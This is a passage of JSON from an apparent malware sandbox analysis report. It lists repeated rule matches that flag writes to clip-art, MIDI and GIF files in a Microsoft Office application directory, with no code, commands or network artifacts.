"version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44111", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00232_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00233_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00233_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44120", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00233_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00402_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00402_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44129", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00402_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00482_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00482_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44136", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00482_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00494_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00494_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44143", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00494_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\urban_01.mid", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44150", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\urban_01.mid\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\vctrn_01.mid", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44157", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\vctrn_01.mid\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01219_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01219_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44164", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01219_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01237_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01237_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44171", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01237_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01238_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01238_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44178", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01238_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01239_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01239_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44185", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01239_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01240_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01240_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44192", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01240_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01241_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01241_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44199", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01241_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01242_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01242_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44206", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01242_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01243_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01243_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44213", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01243_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01244_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01244_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44220", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01244_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01245_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01245_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44227", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01245_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01246_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01246_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44234", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01246_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01253_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01253_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44241", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01253_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01268_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01268_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44248", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01268_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01292_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01292_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44255", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01292_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01293_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01293_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44262", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01293_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01294_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01294_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44269", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01294_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01295_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01295_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44276", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01295_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01296_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01296_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44283", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01296_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01297_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01297_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44290", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01297_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01298_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01298_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44297", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01298_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01299_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01299_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44304", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01299_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01300_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01300_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44311", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01300_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01301_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01301_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44318", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01301_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01304G.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01304g.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44325", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01304g.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01330_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01330_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44332", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01330_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01734_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01734_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44339", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01734_.gif\".", 